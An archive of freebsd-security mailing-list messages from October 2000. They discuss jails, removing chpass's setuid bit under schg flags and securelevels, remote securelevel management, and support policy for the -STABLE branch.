body of the message From owner-freebsd-security Thu Oct 5 4:55:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id B61E737B503 for ; Thu, 5 Oct 2000 04:55:07 -0700 (PDT) Received: from ophelia.nectar.com (ophelia.nectar.com [10.5.5.2]) by gw.nectar.com (Postfix) with ESMTP id 943D71925E; Thu, 5 Oct 2000 06:55:06 -0500 (CDT) Received: (from nectar@localhost) by ophelia.nectar.com (8.9.3/8.9.3) id GAA01278; Thu, 5 Oct 2000 06:56:34 -0500 (CDT) (envelope-from nectar@spawn.nectar.com) Date: Thu, 5 Oct 2000 06:56:34 -0500 From: "Jacques A. Vidrine" To: cjclark@alum.mit.edu Cc: freebsd-security@freebsd.org Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001005065634.A1270@ophelia.nectar.com> Mail-Followup-To: "Jacques A. Vidrine" , cjclark@alum.mit.edu, freebsd-security@freebsd.org References: <20001004084729.C25121@149.211.6.64.reflexcom.com> <20001004114308.B23379@hamlet.nectar.com> <20001004234325.E25121@149.211.6.64.reflexcom.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20001004234325.E25121@149.211.6.64.reflexcom.com>; from cjclark@reflexnet.net on Wed, Oct 04, 2000 at 11:43:25PM -0700 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Oct 04, 2000 at 11:43:25PM -0700, Crist J . Clark wrote: > But anyway, jail(8) is a very different beast from the patches. It is > not practical to put each interactive user in a jail for, say, a > several dozen or several hundered user system. And why is that? -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 5:25:19 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp.doosys.com (smtp.doosys.com [195.64.50.136]) by hub.freebsd.org (Postfix) with ESMTP id 7E7F537B66D for ; Thu, 5 Oct 2000 05:25:15 -0700 (PDT) Received: from smtp.intra.doosys.com (IDENT:itcsrv-doosys@smtp.intra.doosys.com. [10.10.10.12]) by smtp.doosys.com (8.9.3/8.9.3) with ESMTP id OAA90724; Thu, 5 Oct 2000 14:17:17 +0200 (CEST) (envelope-from Bart_van_Leeuwen@doosys.com) From: Bart_van_Leeuwen@doosys.com Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL To: "Jacques A. Vidrine" Cc: freebsd-security@freebsd.org X-Mailer: Lotus Notes Release 5.0.4 June 8, 2000 Message-ID: Date: Thu, 5 Oct 2000 14:25:11 +0200 X-MIMETrack: Serialize by Router on ITCSRV/DOOSYS(Release 5.0.4a |July 24, 2000) at 10/05/2000 02:25:11 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Creating a single jail for a group of interactive users is quite practical. Creating a seperate jail for each individual interactive user can become inpractical for example due to disk space requirements and the complexibility of the evironment for the administrator. One key element in creating a secure environment is being able to get a decent level of insight in what is going on in the environment. Once tools for administrating jails are better developed this picture might change a bit. Bart van Leeuwen. mailto:Bart_van_Leeuwen@doosys.com http://www.doosys.com/ mailto:bart@ixori.demon.nl http://www.ixori.demon.nl/ "Jacques A. Vidrine" To: cjclark@alum.mit.edu Sent by: cc: freebsd-security@FreeBSD.ORG owner-freebsd-security@F Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL reeBSD.ORG 05-10-2000 13:56 On Wed, Oct 04, 2000 at 11:43:25PM -0700, Crist J . Clark wrote: > But anyway, jail(8) is a very different beast from the patches. It is > not practical to put each interactive user in a jail for, say, a > several dozen or several hundered user system. And why is that? -- Jacques Vidrine / n@nectar.com / jvidrine@verio.net / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 6: 3:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.va.home.com (ha1.rdc1.va.home.com [24.2.32.66]) by hub.freebsd.org (Postfix) with ESMTP id 8D9CB37B66C for ; Thu, 5 Oct 2000 06:03:20 -0700 (PDT) Received: from athena ([24.3.219.36]) by mail.rdc1.va.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id <20001005130319.QZDA26082.mail.rdc1.va.home.com@athena>; Thu, 5 Oct 2000 06:03:19 -0700 Message-Id: <4.2.2.20001005090906.0639d560@email.eden.rutgers.edu> X-Sender: damascus@netmail.home.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 05 Oct 2000 09:12:05 -0500 To: dima@unixfreak.org, "Jeffrey J. Mountin" From: Carroll Kong Subject: Re: BSD chpass (fwd) Cc: Dima Dorfman , security@FreeBSD.ORG In-Reply-To: <20001005002410.309DF1F0A@static.unixfreak.org> References: <4.3.2.20001004173510.00afd880@207.227.119.2> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 05:24 PM 10/4/00 -0700, Dima Dorfman wrote: > > At 03:08 AM 10/4/00 -0700, Dima Dorfman wrote: > > > > >IMO, the bottom line is, schg can only prevent an attacker if they > > >don't have a good understanding of the system (which accounts for most > > >of the script kid population). A really clever attacker would modify > > >your securelevel settings in rc.conf, reboot the machine making it > > >look like a panic or power surge (if they know you exclusivly access > > >it remotly), fool around, then change it back. Tripwire on a r/o disk > > >would tell you about it, but you can't do that remotly unless you plan > > >on never touching any system binaries. Or am I missing something? > > > > And why wouldn't you protect /etc as well. Then one would rely on > physical > > security to change the security settings. A real PITA for remote systems, > > but even that could be worked around with some care to allow changes > > (reboot still required) and protect the system. > >You could, but your system would become almost unmanagable. Relying >on going to single user mode to do basic maintenance (say you had >fingerd on in inetd, but now you want to turn it off in light of the >recent hole) isn't such a good idea. > >In my experience, if doing something is a big hassle, it generally >doesn't get done. Say someone discovers a small local DoS in some >serivce you're running. Assuming nobody untrusted has an account, a >local DoS isn't such a big threat. Since you have to physically walk >to the machine, boot it to single user mode (causing minor downtime), >and change it, you'd probably decide to leave it alone. After a while >it builds up, and your machine slowly deteriorates(sp?). And if you >ever can't get to the machine and there's a serious remote hole, >you're in trouble. >Regards > >-- >Dima Dorfman >Finger dima@unixfreak.org for my public PGP key. Not sure if this is just extending the problem, but if it is going to be a reboot box, why not create a special freebsd box that uses an octopus 8-serial port card (for multiple machines) and null modem cables to hook into these "secured" boxes. Naturally we would have to treat this box as a hardened box as well. (running only sshd and firewalled and cannot accept console logging requests). I have heard (ok, sorry I did not test it yet), that the Boot Loader will automatically call up the serial port -> console drivers. So this way you COULD call a reboot and go into single user mode from your special freebsd console box by using minicom! If the most part of the annoyance is physical access, it is somewhat eliminated by my console idea. Passwords would be secured over the serial port (clear text, but no where to broadcast to), unless someone was physically tapping, but if he got that far to tap, you are dead meat anyway. I should get a null modem in my house to test for the "bootloader showing up in console" bit. If you REALLY want full console access like to the BIOS, there is the netweasel. So what do you think? Please respond if there are any flaws in this idea? -Carroll Kong To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 6:26: 1 2000 Delivered-To: freebsd-security@freebsd.org Received: from news.lucky.net (news.lucky.net [193.193.193.102]) by hub.freebsd.org (Postfix) with ESMTP id C25A737B502 for ; Thu, 5 Oct 2000 06:25:55 -0700 (PDT) Received: (from mail@localhost) by news.lucky.net (8.Who.Cares/8.Who.Cares) id QJY08438 for freebsd-security@freebsd.org; Thu, 5 Oct 2000 16:25:53 +0300 (envelope-from white@alkar.net) From: Alex Prohorenko To: freebsd-security@freebsd.org Subject: Re: BSD chpass (fwd) Date: 5 Oct 2000 13:25:08 GMT Organization: Alkar-Teleport News server Message-ID: <8rhvfk$12ue$2@pandora.alkar.net> References: <20001004053422.8A3901F19@static.unixfreak.org> User-Agent: tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (FreeBSD/3.5-STABLE (i386)) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Lines: 17 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Dima Dorfman wrote: >> For those not subscribed to bugtraq, it's time to remove the suid bit on >> chpass. > Unfortunatly it isn't that easy if you're running with securelevel > 0 > since chpass is installed with the schg (system immutable) flag on by > default. Oh well, guess it's time to reboot some hosts. :-/ I do not see any single problem here. chflags noschg /usr/bin/chpass chown u-s /usr/bin/chpass Sounds pretty easy, isn't it? -- Alexander Prohorenko, Alkar Teleport To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 6:30:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0D4A637B66C for ; Thu, 5 Oct 2000 06:30:17 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id PAA05169; Thu, 5 Oct 2000 15:30:01 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Alex Prohorenko Cc: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) References: <20001004053422.8A3901F19@static.unixfreak.org> <8rhvfk$12ue$2@pandora.alkar.net> From: Dag-Erling Smorgrav Date: 05 Oct 2000 15:30:00 +0200 In-Reply-To: Alex Prohorenko's message of "5 Oct 2000 13:25:08 GMT" Message-ID: Lines: 17 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alex Prohorenko writes: > Dima Dorfman wrote: > > Unfortunatly it isn't that easy if you're running with securelevel > 0 > > since chpass is installed with the schg (system immutable) flag on by > > default. Oh well, guess it's time to reboot some hosts. :-/ > I do not see any single problem here. > > chflags noschg /usr/bin/chpass > chown u-s /usr/bin/chpass > > Sounds pretty easy, isn't it? Except that chflags doesn't work at higher securelevels. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 6:36:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from sentry.granch.com (sentry.granch.com [212.109.197.55]) by hub.freebsd.org (Postfix) with ESMTP id BC0B537B502 for ; Thu, 5 Oct 2000 06:36:30 -0700 (PDT) Received: from sentry.granch.ru (IDENT:shelton@localhost [127.0.0.1]) by sentry.granch.com (8.9.3/8.9.3) with ESMTP id UAA02803; Thu, 5 Oct 2000 20:33:49 +0700 (NOVST) Message-ID: <39DC833C.7DDB0AC2@sentry.granch.ru> Date: Thu, 05 Oct 2000 20:33:48 +0700 From: "Rashid N. Achilov" Reply-To: achilov@granch.ru Organization: Granch Ltd. X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: ru, en MIME-Version: 1.0 To: Alex Prohorenko Cc: freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) References: <20001004053422.8A3901F19@static.unixfreak.org> <8rhvfk$12ue$2@pandora.alkar.net> Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Alex Prohorenko wrote: > > I do not see any single problem here. > > chflags noschg /usr/bin/chpass > chown u-s /usr/bin/chpass > > Sounds pretty easy, isn't it? When securelevel 3 (or 2 too, not remember now :-( ) you, even if root, cannot unset schg flag :-) -- With Best Regards. Rashid N. Achilov (RNA1-RIPE), Brainbench ID: 28514 Granch Ltd. lead engineer, e-mail: achilov@granch.ru tel/fax (383-2) 24-2363 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 7:10:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 9E33B37B66D for ; Thu, 5 Oct 2000 07:10:14 -0700 (PDT) Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id VAA52489; Thu, 5 Oct 2000 21:09:31 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru) Date: Thu, 5 Oct 2000 21:09:31 +0700 (NSS) From: Max Khon To: achilov@granch.ru Cc: Alex Prohorenko , freebsd-security@FreeBSD.ORG Subject: Re: BSD chpass (fwd) In-Reply-To: <39DC833C.7DDB0AC2@sentry.granch.ru> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org hi, there! On Thu, 5 Oct 2000, Rashid N. Achilov wrote: > > I do not see any single problem here. > > > > chflags noschg /usr/bin/chpass > > chown u-s /usr/bin/chpass > > > > Sounds pretty easy, isn't it? > > When securelevel 3 (or 2 too, not remember now :-( ) you, even if root, > cannot unset schg flag :-) securelevel 1 is sufficient: man 8 init /fjoe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 8:50:14 2000 Delivered-To: freebsd-security@freebsd.org Received: from news.lucky.net (news.lucky.net [193.193.193.102]) by hub.freebsd.org (Postfix) with ESMTP id 96AA837B66C for ; Thu, 5 Oct 2000 08:50:08 -0700 (PDT) Received: (from mail@localhost) by news.lucky.net (8.Who.Cares/8.Who.Cares) id STG13060 for freebsd-security@freebsd.org; Thu, 5 Oct 2000 18:50:05 +0300 (envelope-from white@alkar.net) From: Alex Prohorenko To: freebsd-security@freebsd.org Subject: Re: BSD chpass (fwd) Date: 5 Oct 2000 15:49:30 GMT Organization: Alkar-Teleport News server Message-ID: <8ri7ua$1h7i$2@pandora.alkar.net> References: <20001004053422.8A3901F19@static.unixfreak.org> <8rhvfk$12ue$2@pandora.alkar.net> <39DC833C.7DDB0AC2@sentry.granch.ru> User-Agent: tin/1.4.4-20000803 ("Vet for the Insane") (UNIX) (FreeBSD/3.5-STABLE (i386)) Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Lines: 14 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Rashid N. Achilov wrote: > Alex Prohorenko wrote: >> I do not see any single problem here. >> chflags noschg /usr/bin/chpass >> chown u-s /usr/bin/chpass >> Sounds pretty easy, isn't it? > When securelevel 3 (or 2 too, not remember now :-( ) you, even if root, > cannot unset schg flag :-) Sorry, I have missed a line concerning securelevel. Of course, you're right. -- Alexander Prohorenko, Alkar Teleport To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 9:52:59 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id AF28B37B503 for ; Thu, 5 Oct 2000 09:52:54 -0700 (PDT) Received: from netrinsics.com([202.106.213.194]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm1039dcfb7b; Thu, 5 Oct 2000 16:52:44 -0000 Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e95GRBX07405 for freebsd-security@freebsd.org; Fri, 6 Oct 2000 00:27:11 +0800 (+0800) (envelope-from robinson) Date: Fri, 6 Oct 2000 00:27:11 +0800 (+0800) From: Michael Robinson Message-Id: <200010051627.e95GRBX07405@netrinsics.com> To: freebsd-security@freebsd.org Subject: Downgrading securelevel on remote servers Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Then they'd go change /etc/rc. You could set most of your root >filesystem, including /etc, schg, which may help, but then you'd be >making your machine almost unmanagable without console access. For >example, how would you fix this chpass bug if you couldn't access the >console and had no way to lower the securelevel, even with a reboot? The solution I came to for this problem was to use Gnu Privacy Guard to sign scripts in /usr/local/etc/secure, and a script that verified the signatures and executed them prior to the securelevel being set in /etc/rc. If you needed to do something like change the suid bit on chpass, you would write a script to do that, sign it, install it, reboot, and remove the script. The server only kept a copy of the public key (the keyring was noschg, of course). I don't need to do that anymore, though, because now I have an OOB Cisco 2509 connected to the console ports on our colocated servers. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 10: 0:47 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with SMTP id 790DA37B502 for ; Thu, 5 Oct 2000 10:00:44 -0700 (PDT) Received: from netrinsics.com([202.106.228.31]) by public.bta.net.cn(JetMail 2.5.3.0) with SMTP id jm439dcfd51; Thu, 5 Oct 2000 17:00:34 -0000 Received: (from robinson@localhost) by netrinsics.com (8.11.0/8.9.3) id e95H22D07580 for freebsd-security@FreeBSD.ORG; Fri, 6 Oct 2000 01:02:02 +0800 (+0800) (envelope-from robinson) Date: Fri, 6 Oct 2000 01:02:02 +0800 (+0800) From: Michael Robinson Message-Id: <200010051702.e95H22D07580@netrinsics.com> To: freebsd-security@FreeBSD.ORG Subject: Re: Downgrading securelevel on remote servers In-Reply-To: <200010051627.e95GRBX07405@netrinsics.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >The server only kept a copy of the public key (the keyring was noschg, of >course). ^^^^^^ "schg" -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 10: 4:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 204BF37B503; Thu, 5 Oct 2000 10:04:05 -0700 (PDT) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id LAA15026; Thu, 5 Oct 2000 11:03:48 -0600 (MDT) Message-Id: <4.3.2.7.2.20001005105420.04a7b540@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Thu, 05 Oct 2000 11:03:42 -0600 To: Ralph Huntington , "David O'Brien" From: Brett Glass Subject: Re: Stable branch Cc: Paul Richards , cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-Reply-To: References: <20001004220906.D50210@dragon.nuxi.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 04:06 AM 10/5/2000, Ralph Huntington wrote: >Stable branch is very important for production use and should incorporate >bug fixes and security patches, but not feature enhancements. The extent >of support and maintenance for stable should be one major release prior to >the latest release (not current), i.e., since 4.x-RELEASE is the latest, >then 3.x-STABLE hould be supported with bug fixes and security patches >until a 5.x-RELEASE is out. > >Does this seem unreasonable? -=r=- Perhaps this should be formalized as three branches: Branch name: Bug/security New features? "Breakable" for fixes? a day or more? -PRODUCTION YES NO NO -STABLE YES YES, PREFERABLY NO AFTER TESTING IN -CURRENT -DEVELOPMENT YES YES YES (formerly -CURRENT) What do you think of this as a model for what people seem to be asking for? --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 10:41:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from peak.mountin.net (peak.mountin.net [207.227.119.2]) by hub.freebsd.org (Postfix) with ESMTP id C146937B678 for ; Thu, 5 Oct 2000 10:41:02 -0700 (PDT) Received: (from daemon@localhost) by peak.mountin.net (8.9.1/8.9.1) id MAA07435; Thu, 5 Oct 2000 12:40:59 -0500 (CDT) (envelope-from jeff-ml@mountin.net) Received: from dial-99.max1.wa.cyberlynk.net(207.227.118.99) by peak.mountin.net via smap (V1.3) id sma007431; Thu Oct 5 12:40:54 2000 Message-Id: <4.3.2.20001005120823.00d3b6c0@207.227.119.2> X-Sender: jeff-ml@207.227.119.2 X-Mailer: QUALCOMM Windows Eudora Version 4.3 Date: Thu, 05 Oct 2000 12:35:15 -0500 To: Michael Robinson , freebsd-security@FreeBSD.ORG From: "Jeffrey J. Mountin" Subject: Re: Downgrading securelevel on remote servers In-Reply-To: <200010051627.e95GRBX07405@netrinsics.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 12:27 AM 10/6/00 +0800, Michael Robinson wrote: >The solution I came to for this problem was to use Gnu Privacy Guard to >sign scripts in /usr/local/etc/secure, and a script that verified the >signatures and executed them prior to the securelevel being set in /etc/rc. > >If you needed to do something like change the suid bit on chpass, you would >write a script to do that, sign it, install it, reboot, and remove the script. >The server only kept a copy of the public key (the keyring was noschg, of >course). With some thought this should work well. >I don't need to do that anymore, though, because now I have an OOB Cisco 2509 >connected to the console ports on our colocated servers. And the somewhat easier, but slower way. Slower in the time involved to hand edit. See little point in using secure levels if one doesn't protect the mechanism. Dima pointed out the hassle involved, but then extra hassle is to be expected as the security increases. The question always is how far one wishes to go and the costs involved. YMMV Jeff Mountin - jeff@mountin.net Systems/Network Administrator FreeBSD - the power to serve To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 11:24:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 7BBB937B503; Thu, 5 Oct 2000 11:24:48 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e95IOkK00529; Thu, 5 Oct 2000 12:24:47 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA00945; Thu, 5 Oct 2000 12:24:46 -0600 (MDT) Message-Id: <200010051824.MAA00945@harmony.village.org> To: Ralph Huntington Subject: Re: Stable branch Cc: developers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG In-reply-to: Your message of "Thu, 05 Oct 2000 06:06:52 EDT." References: Date: Thu, 05 Oct 2000 12:24:46 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message Ralph Huntington writes: : the latest release (not current), i.e., since 4.x-RELEASE is the latest, : then 3.x-STABLE hould be supported with bug fixes and security patches : until a 5.x-RELEASE is out. : : Does this seem unreasonable? -=r=- Yes and no. It sounds reasonable, but puts a significant burdon on the security officer and his security team to make it happen. Having two machines for -current and -stable is bad enough, plus test compiling patches on the last N RELEASES of -stable puts a fair load on getting an advisory out. Making that include a second branch will nearly double the work and pita factor to make it happen. When I was doing 4.0-current, 3.2-stable, 3.2-release, 3.1-release, 3.0-release, 2.2.8-release and 2.2.8-stable regression testing on a couple of kernel patches it took me a *HUGE* amount of time. 40% of it for 4.x and 3.x and 60% for the 2.2.8-stable and -release. Why so much for 2.x? the original author of the patch hadn't back ported it, was disinclined to back port it so I wound up doing it. This made it extremely painful to try to get the advisory out (I think it was 6 weeks from the time the bug hit -current until I sent the advisory out). Until you pay someone to do this full time, it isn't going to happen. History has shown this. This suggestion comes up every N years, we do OK with it for a couple of months until one bug comes along that's such a pain in the butt that we say "screw this old stuff, I'm just going to stop doing it because it is too much of a pita and no one seems to care enough to help." and then are happy for a while until we cut the next major branch in which case we recapitulate the whole process. Sorry to be such a sour puss, but I've "been there, tried that" before. Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 11:30:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (Postfix) with ESMTP id 4784637B502; Thu, 5 Oct 2000 11:30:09 -0700 (PDT) Received: from harmony.village.org (harmony.village.org [10.0.0.6]) by rover.village.org (8.11.0/8.11.0) with ESMTP id e95IU7K00564; Thu, 5 Oct 2000 12:30:07 -0600 (MDT) (envelope-from imp@harmony.village.org) Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.3/8.8.3) with ESMTP id MAA01024; Thu, 5 Oct 2000 12:30:06 -0600 (MDT) Message-Id: <200010051830.MAA01024@harmony.village.org> To: Brett Glass Subject: Re: Stable branch Cc: developers@freebsd.org, security@freebsd.org In-reply-to: Your message of "Thu, 05 Oct 2000 11:03:42 MDT." <4.3.2.7.2.20001005105420.04a7b540@localhost> References: <4.3.2.7.2.20001005105420.04a7b540@localhost> <20001004220906.D50210@dragon.nuxi.com> Date: Thu, 05 Oct 2000 12:30:06 -0600 From: Warner Losh Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20001005105420.04a7b540@localhost> Brett Glass writes: : Perhaps this should be formalized as three branches: : : Branch name: Bug/security New features? "Breakable" for : fixes? a day or more? : : -PRODUCTION YES NO NO : : -STABLE YES YES, PREFERABLY NO : AFTER TESTING : IN -CURRENT : : -DEVELOPMENT YES YES YES : (formerly -CURRENT) Don't change -current's name. : What do you think of this as a model for what people seem to be : asking for? It is what people are asking for, but for which committers aren't doing. Until someone can be motivated to do 3.x stuff on a regular basis, several someones actually, it won't happen. Otherwise would do a PR spin with the following patch to 3.x would do the trick (I'd call it -solid, because -stable is suitable for production machines). Index: newvers.sh =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/sys/conf/newvers.sh,v retrieving revision 1.41.2.16 diff -u -r1.41.2.16 newvers.sh --- newvers.sh 2000/06/20 16:13:59 1.41.2.16 +++ newvers.sh 2000/10/05 18:29:48 @@ -36,7 +36,7 @@ TYPE="FreeBSD" REVISION="3.5" -BRANCH="STABLE" +BRANCH="SOLID" RELEASE="${REVISION}-${BRANCH}" SNAPDATE="" if [ "X${SNAPDATE}" != "X" ]; then Warner To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 11:33:15 2000 Delivered-To: freebsd-security@freebsd.org Received: from pike.osd.bsdi.com (pike.osd.bsdi.com [204.216.28.222]) by hub.freebsd.org (Postfix) with ESMTP id B640337B66E; Thu, 5 Oct 2000 11:33:05 -0700 (PDT) Received: from laptop.baldwin.cx (john@dhcp248.osd.bsdi.com [204.216.28.248]) by pike.osd.bsdi.com (8.11.0/8.9.3) with ESMTP id e95IWKi09519; Thu, 5 Oct 2000 11:32:20 -0700 (PDT) (envelope-from jhb@FreeBSD.org) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <4.3.2.7.2.20001005105420.04a7b540@localhost> Date: Thu, 05 Oct 2000 11:32:34 -0700 (PDT) From: John Baldwin To: Brett Glass Subject: Re: Stable branch Cc: freebsd-security@FreeBSD.org, cvs-committers@FreeBSD.org, Paul Richards , "David O'Brien" , Ralph Huntington Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 05-Oct-00 Brett Glass wrote: > At 04:06 AM 10/5/2000, Ralph Huntington wrote: > >>Stable branch is very important for production use and should incorporate >>bug fixes and security patches, but not feature enhancements. The extent >>of support and maintenance for stable should be one major release prior to >>the latest release (not current), i.e., since 4.x-RELEASE is the latest, >>then 3.x-STABLE hould be supported with bug fixes and security patches >>until a 5.x-RELEASE is out. >> >>Does this seem unreasonable? -=r=- > > > Perhaps this should be formalized as three branches: > > Branch name: Bug/security New features? "Breakable" for > fixes? a day or more? > > -PRODUCTION YES NO NO This is called sticking with a release and applying security patches as they are released. It already exists. > -STABLE YES YES, PREFERABLY NO > AFTER TESTING > IN -CURRENT > > -DEVELOPMENT YES YES YES > (formerly -CURRENT) > > What do you think of this as a model for what people seem to be > asking for? Seems to be the one we are already using. > --Brett -- John Baldwin -- http://www.FreeBSD.org/~jhb/ PGP Key: http://www.baldwin.cx/~john/pgpkey.asc "Power Users Use the Power to Serve!" - http://www.FreeBSD.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 5 12:38:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id E591937B66C; Thu, 5 Oct 2000 12:38:36 -0700 (PDT) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id PAA38180; Thu, 5 Oct 2000 15:37:46 -0400 (EDT) (envelope-from robert@fledge.watson.org) Date: Thu, 5 Oct 2000 15:37:46 -0400 (EDT) From: Robert 